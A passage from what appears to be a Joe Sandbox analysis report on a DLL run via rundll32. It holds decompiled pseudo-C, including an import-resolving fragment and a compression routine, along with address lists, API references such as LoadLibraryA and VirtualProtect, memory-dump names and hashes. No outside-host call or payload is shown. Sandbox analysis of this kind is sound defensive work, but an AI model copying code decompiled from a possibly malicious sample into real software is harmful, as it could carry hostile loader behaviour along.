                                                                                                                                                                                                                										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_v12 =  &(_v12[1]);
                                                                                                                                                                                                                								_v28 = _v28 + 4;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_v8 = _v8 + 0x14;
                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t163 = 0xfffffffd;
                                                                                                                                                                                                                						return _t163;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L24;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return __eax | 0xffffffff;
                                                                                                                                                                                                                			}























                                                                                                                                                                                                                0x1001478c
                                                                                                                                                                                                                0x10014792
                                                                                                                                                                                                                0x1001479a
                                                                                                                                                                                                                0x100147af
                                                                                                                                                                                                                0x100147c1
                                                                                                                                                                                                                0x100147cd
                                                                                                                                                                                                                0x100147d3
                                                                                                                                                                                                                0x100147d8
                                                                                                                                                                                                                0x100147e4
                                                                                                                                                                                                                0x1001494f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001494f
                                                                                                                                                                                                                0x100147ea
                                                                                                                                                                                                                0x100147f3
                                                                                                                                                                                                                0x10014801
                                                                                                                                                                                                                0x10014804
                                                                                                                                                                                                                0x10014813
                                                                                                                                                                                                                0x10014813
                                                                                                                                                                                                                0x1001481a
                                                                                                                                                                                                                0x10014828
                                                                                                                                                                                                                0x1001482b
                                                                                                                                                                                                                0x1001483b
                                                                                                                                                                                                                0x10014848
                                                                                                                                                                                                                0x1001484f
                                                                                                                                                                                                                0x1001485f
                                                                                                                                                                                                                0x10014871
                                                                                                                                                                                                                0x10014877
                                                                                                                                                                                                                0x10014861
                                                                                                                                                                                                                0x10014869
                                                                                                                                                                                                                0x10014869
                                                                                                                                                                                                                0x1001487a
                                                                                                                                                                                                                0x1001487e
                                                                                                                                                                                                                0x1001488a
                                                                                                                                                                                                                0x1001488e
                                                                                                                                                                                                                0x10014892
                                                                                                                                                                                                                0x10014896
                                                                                                                                                                                                                0x100148a2
                                                                                                                                                                                                                0x100148cd
                                                                                                                                                                                                                0x100148d5
                                                                                                                                                                                                                0x100148db
                                                                                                                                                                                                                0x100148e7
                                                                                                                                                                                                                0x100148f3
                                                                                                                                                                                                                0x100148a4
                                                                                                                                                                                                                0x100148a9
                                                                                                                                                                                                                0x100148b4
                                                                                                                                                                                                                0x100148c0
                                                                                                                                                                                                                0x100148c0
                                                                                                                                                                                                                0x100148fc
                                                                                                                                                                                                                0x10014902
                                                                                                                                                                                                                0x1001490c
                                                                                                                                                                                                                0x10014928
                                                                                                                                                                                                                0x1001490e
                                                                                                                                                                                                                0x10014911
                                                                                                                                                                                                                0x1001491d
                                                                                                                                                                                                                0x1001491d
                                                                                                                                                                                                                0x1001490c
                                                                                                                                                                                                                0x10014930
                                                                                                                                                                                                                0x10014939
                                                                                                                                                                                                                0x10014939
                                                                                                                                                                                                                0x10014947
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014947
                                                                                                                                                                                                                0x10014853
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014853
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001482b
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100147A9
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 10014842
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                                • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                                                • API String ID: 4133054770-1584408056
                                                                                                                                                                                                                • Opcode ID: fe3bb8f99f532b67af30be6aff3995f60063c948105e1a9caee6d08fae784d45
                                                                                                                                                                                                                • Instruction ID: 8b6fcfd140f2f906d51b79ea8514458062b2bcfb6dcd42a390860808ae8ece4b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe3bb8f99f532b67af30be6aff3995f60063c948105e1a9caee6d08fae784d45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2619F75D00209EFDB00CF98C481BADBBF1FF08365F218599E815AB2A1DB34AA81DF50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 1804819252-2766056989
                                                                                                                                                                                                                • Opcode ID: dd0d99adfd2ffd53138fc8728975c7a542ee737ff5ba6e544f4d3a9c1ee6c446
                                                                                                                                                                                                                • Instruction ID: 45dabc64c29d0d04d049ea0e05bff10a6739e34b8c88f5f4a194d3f13399f38f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd0d99adfd2ffd53138fc8728975c7a542ee737ff5ba6e544f4d3a9c1ee6c446
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 284181769043018FDB10DF68C68561AFBF4FF4A324F458A29D8A89B304E338E446CF96
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32 ref: 6937230D
                                                                                                                                                                                                                • VirtualProtect.KERNEL32 ref: 69372367
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6938B524), ref: 69372374
                                                                                                                                                                                                                  • Part of subcall function 69372EA8: fwrite.MSVCRT ref: 69372ED7
                                                                                                                                                                                                                  • Part of subcall function 69372EA8: vfprintf.MSVCRT ref: 69372EF7
                                                                                                                                                                                                                  • Part of subcall function 69372EA8: abort.MSVCRT ref: 69372EFC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 1616349570-2766056989
                                                                                                                                                                                                                • Opcode ID: 86c0dda3de06ea6ab3c9335e3712fc4df83484684ba0d1a7f146376356397ae6
                                                                                                                                                                                                                • Instruction ID: db348d529f06913b54d1c39fbc3be87fc87b17a083a0e57a2f9a1b5d3835264a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86c0dda3de06ea6ab3c9335e3712fc4df83484684ba0d1a7f146376356397ae6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5213AB68043418FDB10DF38D685619FBE0FF4A318F05CA29D8A89B254E338E506CF56
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 99%
                                                                                                                                                                                                                			E10015390(int _a4, signed int _a8) {
                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                				void* _t137;
                                                                                                                                                                                                                				signed int _t141;
                                                                                                                                                                                                                				intOrPtr* _t142;
                                                                                                                                                                                                                				signed int _t145;
                                                                                                                                                                                                                				signed int _t146;
                                                                                                                                                                                                                				intOrPtr _t151;
                                                                                                                                                                                                                				intOrPtr _t161;
                                                                                                                                                                                                                				intOrPtr _t162;
                                                                                                                                                                                                                				intOrPtr _t167;
                                                                                                                                                                                                                				intOrPtr _t170;
                                                                                                                                                                                                                				signed int _t172;
                                                                                                                                                                                                                				intOrPtr _t173;
                                                                                                                                                                                                                				int _t184;
                                                                                                                                                                                                                				intOrPtr _t185;
                                                                                                                                                                                                                				intOrPtr _t188;
                                                                                                                                                                                                                				signed int _t189;
                                                                                                                                                                                                                				void* _t195;
                                                                                                                                                                                                                				int _t202;
                                                                                                                                                                                                                				int _t208;
                                                                                                                                                                                                                				intOrPtr _t217;
                                                                                                                                                                                                                				signed int _t218;
                                                                                                                                                                                                                				int _t219;
                                                                                                                                                                                                                				intOrPtr _t220;
                                                                                                                                                                                                                				signed int _t221;
                                                                                                                                                                                                                				signed int _t222;
                                                                                                                                                                                                                				int _t224;
                                                                                                                                                                                                                				int _t225;
                                                                                                                                                                                                                				signed int _t227;
                                                                                                                                                                                                                				intOrPtr _t228;
                                                                                                                                                                                                                				int _t232;
                                                                                                                                                                                                                				int _t234;
                                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                                				int _t239;
                                                                                                                                                                                                                				void* _t240;
                                                                                                                                                                                                                				int _t245;
                                                                                                                                                                                                                				int _t252;
                                                                                                                                                                                                                				signed int _t253;
                                                                                                                                                                                                                				int _t254;
                                                                                                                                                                                                                				void* _t257;
                                                                                                                                                                                                                				void* _t258;
                                                                                                                                                                                                                				int _t259;
                                                                                                                                                                                                                				intOrPtr _t260;
                                                                                                                                                                                                                				int _t261;
                                                                                                                                                                                                                				signed int _t269;
                                                                                                                                                                                                                				signed int _t271;
                                                                                                                                                                                                                				intOrPtr* _t272;
                                                                                                                                                                                                                				void* _t273;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t253 = _a8;
                                                                                                                                                                                                                				_t272 = _a4;
                                                                                                                                                                                                                				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                                                				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                				_t228 =  *_t4;
                                                                                                                                                                                                                				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                                                                				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                                                                				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                                                                				_t269 = 0;
                                                                                                                                                                                                                				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                                                                				asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                					_t8 = _t272 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                                                                					_v12 = 0xffff;
                                                                                                                                                                                                                					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                                                                					if(_t217 < _t141) {
                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t11 = _t272 + 0x6c; // 0x20d88a1
                                                                                                                                                                                                                					_t12 = _t272 + 0x5c; // 0x9fe85000
                                                                                                                                                                                                                					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                                                                					_v8 = _t245;
                                                                                                                                                                                                                					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                                                                					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                                                                					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                                                                					if(_t227 >= _v16) {
                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                						if(_t253 != 4) {
                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                							_t269 = 0;
                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							_t285 = _t227 - _t195;
                                                                                                                                                                                                                							if(_t227 != _t195) {
                                                                                                                                                                                                                								goto L10;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								_t269 = _t253 - 3;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						E100183B0(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                                                                						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                                						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                                						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                                                                						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                                						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                                						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                                                                						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                                						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                                						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                                                                						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                                						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                                						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                                                                						E10017110(_t285,  *_t272);
                                                                                                                                                                                                                						_t202 = _v8;
                                                                                                                                                                                                                						_t273 = _t273 + 0x14;
                                                                                                                                                                                                                						if(_t202 != 0) {
                                                                                                                                                                                                                							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                                                                							_v8 = _t208;
                                                                                                                                                                                                                							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                							_t37 = _t272 + 0x5c; // 0x9fe85000
                                                                                                                                                                                                                							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                                							_t252 = _v8;
                                                                                                                                                                                                                							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                                                                							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                                                                							_t227 = _t227 - _t252;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						if(_t227 != 0) {
                                                                                                                                                                                                                							E10017250( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                                							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t253 = _a8;
                                                                                                                                                                                                                						if(_t269 == 0) {
                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                                                                							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                                                                								goto L7;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t142 =  *_t272;
                                                                                                                                                                                                                				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                                                                				_a4 = _t232;
                                                                                                                                                                                                                				if(_t232 == 0) {
                                                                                                                                                                                                                					_t83 = _t272 + 0x6c; // 0x20d88a1
                                                                                                                                                                                                                					_t254 =  *_t83;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                					_t224 =  *_t59;
                                                                                                                                                                                                                					if(_t232 < _t224) {
                                                                                                                                                                                                                						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                                                						_t66 = _t272 + 0x6c; // 0x20d88a1
                                                                                                                                                                                                                						_t260 =  *_t66;
                                                                                                                                                                                                                						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                                                                						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                                                                							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                							_t261 = _t260 - _t224;
                                                                                                                                                                                                                							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                                                                							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                                                                							_t70 = _t272 + 0x16b0; // 0x48af445
                                                                                                                                                                                                                							_t188 =  *_t70;
                                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                                							_t232 = _a4;
                                                                                                                                                                                                                							__eflags = _t188 - 2;
                                                                                                                                                                                                                							if(_t188 < 2) {
                                                                                                                                                                                                                								_t189 = _t188 + 1;
                                                                                                                                                                                                                								__eflags = _t189;
                                                                                                                                                                                                                								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                						_t74 = _t272 + 0x6c; // 0x20d88a1
                                                                                                                                                                                                                						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                                                                						_t225 = _a4;
                                                                                                                                                                                                                						_t273 = _t273 + 0xc;
                                                                                                                                                                                                                						_t76 = _t272 + 0x6c;
                                                                                                                                                                                                                						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                                                                						__eflags =  *_t76;
                                                                                                                                                                                                                						_t78 = _t272 + 0x6c; // 0x20d88a1
                                                                                                                                                                                                                						_t184 =  *_t78;
                                                                                                                                                                                                                						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                						_t239 =  *_t79;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                                                                						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                                                                						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                						_t184 =  *_t62;
                                                                                                                                                                                                                						_t273 = _t273 + 0xc;
                                                                                                                                                                                                                						_t225 = _a4;
                                                                                                                                                                                                                						_t239 = _t184;
                                                                                                                                                                                                                						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t254 = _t184;
                                                                                                                                                                                                                					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                                                                					_t81 = _t272 + 0x16b4; // 0x2c20206
                                                                                                                                                                                                                					_t185 =  *_t81;
                                                                                                                                                                                                                					_t240 = _t239 - _t185;
                                                                                                                                                                                                                					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                                                                					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                                                					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                                                                					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				if(_t269 == 0) {
                                                                                                                                                                                                                					_t218 = _a8;
                                                                                                                                                                                                                					__eflags = _t218;
                                                                                                                                                                                                                					if(_t218 == 0) {
                                                                                                                                                                                                                						L34:
                                                                                                                                                                                                                						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                                                						_t219 =  *_t272;
                                                                                                                                                                                                                						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                                                                						_a4 =  *_t272;
                                                                                                                                                                                                                						_t234 = _t254;
                                                                                                                                                                                                                						_v16 = _t145;
                                                                                                                                                                                                                						_v8 = _t254;
                                                                                                                                                                                                                						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                                                                							_v8 = _t254;
                                                                                                                                                                                                                							_t95 = _t272 + 0x5c; // 0x9fe85000
                                                                                                                                                                                                                							_a4 = _t219;
                                                                                                                                                                                                                							_t234 = _t254;
                                                                                                                                                                                                                							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                                                                							if( *_t95 >=  *_t97) {
                                                                                                                                                                                                                								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                								_t167 =  *_t98;
                                                                                                                                                                                                                								_t259 = _t254 - _t167;
                                                                                                                                                                                                                								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                                                                								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                                                                								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                                                                								_t103 = _t272 + 0x16b0; // 0x48af445
                                                                                                                                                                                                                								_t170 =  *_t103;
                                                                                                                                                                                                                								_t273 = _t273 + 0xc;
                                                                                                                                                                                                                								__eflags = _t170 - 2;
                                                                                                                                                                                                                								if(_t170 < 2) {
                                                                                                                                                                                                                									_t172 = _t170 + 1;
                                                                                                                                                                                                                									__eflags = _t172;
                                                                                                                                                                                                                									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                								_t145 = _v16 +  *_t106;
                                                                                                                                                                                                                								__eflags = _t145;
                                                                                                                                                                                                                								_a4 =  *_t272;
                                                                                                                                                                                                                								_t108 = _t272 + 0x6c; // 0x20d88a1
                                                                                                                                                                                                                								_t234 =  *_t108;
                                                                                                                                                                                                                								_v8 = _t234;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t255 = _a4;
                                                                                                                                                                                                                						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                                                                						__eflags = _t145 - _t220;
                                                                                                                                                                                                                						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                                                                						_t146 = _t221;
                                                                                                                                                                                                                						_a4 = _t221;
                                                                                                                                                                                                                						_t222 = _a8;
                                                                                                                                                                                                                						__eflags = _t146;
                                                                                                                                                                                                                						if(_t146 != 0) {
                                                                                                                                                                                                                							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                							E10017250(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                                							_t117 = _t272 + 0x6c;
                                                                                                                                                                                                                							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                                                                							__eflags =  *_t117;
                                                                                                                                                                                                                							_t119 = _t272 + 0x6c; // 0x20d88a1
                                                                                                                                                                                                                							_t234 =  *_t119;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                                                                						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                                                                							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t122 = _t272 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                                                						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                                                                						__eflags = _t257 - 0xffff;
                                                                                                                                                                                                                						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                                                                						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                						_t151 =  *_t124;
                                                                                                                                                                                                                						_t125 = _t272 + 0x5c; // 0x9fe85000
                                                                                                                                                                                                                						_t235 = _t234 -  *_t125;
                                                                                                                                                                                                                						__eflags = _t258 - _t151;
                                                                                                                                                                                                                						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                                                                						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                                                                						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                                                                							L49:
                                                                                                                                                                                                                							__eflags = _t235 - _t258;
                                                                                                                                                                                                                							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                                                                							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                                                                							__eflags = _t222 - 4;
                                                                                                                                                                                                                							if(_t222 != 4) {
                                                                                                                                                                                                                								L53:
                                                                                                                                                                                                                								_t269 = 0;
                                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								_t161 =  *_t272;
                                                                                                                                                                                                                								__eflags =  *(_t161 + 4);
                                                                                                                                                                                                                								_t154 = _a4;
                                                                                                                                                                                                                								if( *(_t161 + 4) != 0) {
                                                                                                                                                                                                                									goto L53;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									__eflags = _t154 - _t235;
                                                                                                                                                                                                                									if(_t154 != _t235) {
                                                                                                                                                                                                                										goto L53;
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										_t269 = _t222 - 3;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                							_t132 = _t272 + 0x5c; // 0x9fe85000
                                                                                                                                                                                                                							E100183B0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                                                                							_t134 = _t272 + 0x5c;
                                                                                                                                                                                                                							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                                                                							__eflags =  *_t134;
                                                                                                                                                                                                                							E10017110( *_t134,  *_t272);
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							__eflags = _t235;
                                                                                                                                                                                                                							if(_t235 != 0) {
                                                                                                                                                                                                                								L46:
                                                                                                                                                                                                                								__eflags = _t222;
                                                                                                                                                                                                                								if(_t222 != 0) {
                                                                                                                                                                                                                									_t162 =  *_t272;
                                                                                                                                                                                                                									__eflags =  *(_t162 + 4);
